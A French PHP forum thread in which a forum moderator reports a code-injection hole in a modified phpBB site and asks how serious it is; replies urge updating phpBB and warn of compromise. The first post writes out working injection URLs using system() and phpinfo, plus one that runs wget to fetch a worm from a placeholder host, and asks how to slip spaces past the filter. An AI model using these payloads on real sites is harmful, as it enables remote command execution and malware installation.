IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

Problème de Php code injection


Sujet :

Langage PHP

Vue hybride

Message précédent Message précédent   Message suivant Message suivant
  1. #1
    Membre confirmé
    Profil pro
    Inscrit en
    Décembre 2006
    Messages
    93
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2006
    Messages : 93
    Par défaut Problème de Php code injection
    Bonjour,


    Pour vous placer rapidement le contexte, je suis passé modérateur sur un forum qui parle modélisme.

    Développeur C# de métier, je me suis un peu intéressé au forum en question qui n'est plus maintenu depuis un moment.

    Le problème est que j'ai trouvé une faille d'injection de code php.
    En injectant le code php comme ceci je vois le listing des fichiers dans le répertoire courant:
    http://blabbla.fr?ref=dsqds567dsq'{${system(ls)}}
    comme ceci je vois tous les infos php
    http://blabbla.fr?ref=dsqds567dsq'{${phpinfo(INFO_ALL)}}

    Jusque là ce n'est pas trop grave je pense puisque je n'arrive pas à placer des espaces.
    http://blabbla.fr?ref=dsqds567dsq'{${system(ls /etc/)}}
    http://blabbla.fr?ref=dsqds567dsq'{${system(ls%20/etc/)}}
    ne fonctionnent pas.

    C'est là ou je demande votre aide, est-ce grave en l'état? Quelles commandes pourrait être dangereuse?
    j'ai vu sur le net que beaucoup font des
    http://blabbla.fr?ref=dsqds567dsq'{${system(wget%20http://monworm)}}
    Il y a-t-il un moyen que je connais pas pour que l'espace soit correctement reconnu ?


    J'y connais rien en PHP, je vous demande votre avis, ca m'éviterai de me plonger dans ce code pour corriger ca.


    Merci d'avance!

  2. #2
    Modérateur
    Avatar de sabotage
    Homme Profil pro
    Inscrit en
    Juillet 2005
    Messages
    29 208
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations forums :
    Inscription : Juillet 2005
    Messages : 29 208
    Par défaut
    Plutot qu'un problème d'espace, j'espere que c'est un problème de droits.
    Enfin pouvoir lister des fichiers c'est déjà assez catastrophique je trouve. Quel forum moisi permet ça ?
    N'oubliez pas de consulter les FAQ PHP et les cours et tutoriels PHP

  3. #3
    Membre confirmé
    Profil pro
    Inscrit en
    Décembre 2006
    Messages
    93
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2006
    Messages : 93
    Par défaut
    Tu comprendras que je ne préfère pas divulguer l'adresse du forum avant d'avoir corriger le problème.

    Le forum c'est un phpBB traficoté sinon.

  4. #4
    Modérateur
    Avatar de sabotage
    Homme Profil pro
    Inscrit en
    Juillet 2005
    Messages
    29 208
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations forums :
    Inscription : Juillet 2005
    Messages : 29 208
    Par défaut
    Je parlais du moteur de forum, pas du site
    soit c'est une très vieille version de PHPbb soit il a été mochement trafiqué effectivement.
    N'oubliez pas de consulter les FAQ PHP et les cours et tutoriels PHP

  5. #5
    Membre Expert

    Profil pro
    Inscrit en
    Mai 2008
    Messages
    1 576
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2008
    Messages : 1 576
    Par défaut
    Je m'étonne quand même qu'une version même ancienne de phpBB permette ce genre d'injection.

    Regarde s'il y a des correctifs pour cette version de phpBB. S'il n'y en a pas, ou si le forum est trop modifié pour que tu puisses les appliquer (*), tu es mal. Dans ce cas, si tu es dans un serveur dédié ou un VPS il y a peut-être des palliatifs (qui ne corrigeront pas la totalité du problème). Mais si en plus tu es sur un mutualisé sans possibilité de modifier la configuration de PHP ou d'installer un module apache, je ne vois pas de solution.

    Ou alors installe une version plus récente de phpBB...


    (*) À tous les débutants (et non-débutants): NE JAMAIS MODIFIER LE CORE D'UNE APPLICATION! Passez toujours par un plugin, module, extension, bibliothèque, etc...

    Et si ça se trouve ton site est déjà compromis depuis des années :-(

  6. #6
    Membre confirmé
    Profil pro
    Inscrit en
    Décembre 2006
    Messages
    93
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2006
    Messages : 93
    Par défaut
    On a un serveur dédié.

    Concernant la faille elle se trouve sur un bout de code php permettant de lire une video youtube. Aucune idée si il s'agit d'un bidouillage, d'un plugin, ou d'une fonction native phpBB.

    N'y connaissant rien et ne connaissant pas l'impacte du bidouillage, je vais dans un premier temps récupéré tous ca sur un autre poste, et tester la MAJ phpBB.


    Sinon, j'ai testé a peu près toutes les commandes que j'ai pu trouver ici : http://doc.ubuntu-fr.org/tutoriel/co...mandes_de_base
    Si pas possibilité d'insérer des espaces, la marche de manoeuvre est quand meme limité je trouve.

Discussions similaires

  1. Problème execution de code PHP
    Par westbam dans le forum Apache
    Réponses: 3
    Dernier message: 04/11/2009, 22h36
  2. [MySQL] Problème dans mon code entre une recherche mysql et en php
    Par pasbonte dans le forum PHP & Base de données
    Réponses: 4
    Dernier message: 27/12/2008, 14h04
  3. [Système] problème d'exécution code php
    Par QuenTinO dans le forum Langage
    Réponses: 1
    Dernier message: 24/04/2007, 11h50
  4. Réponses: 1
    Dernier message: 24/01/2007, 13h34
  5. [MySQL] Un problème dans le code PHP
    Par jack_1981 dans le forum PHP & Base de données
    Réponses: 3
    Dernier message: 31/07/2006, 11h06

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo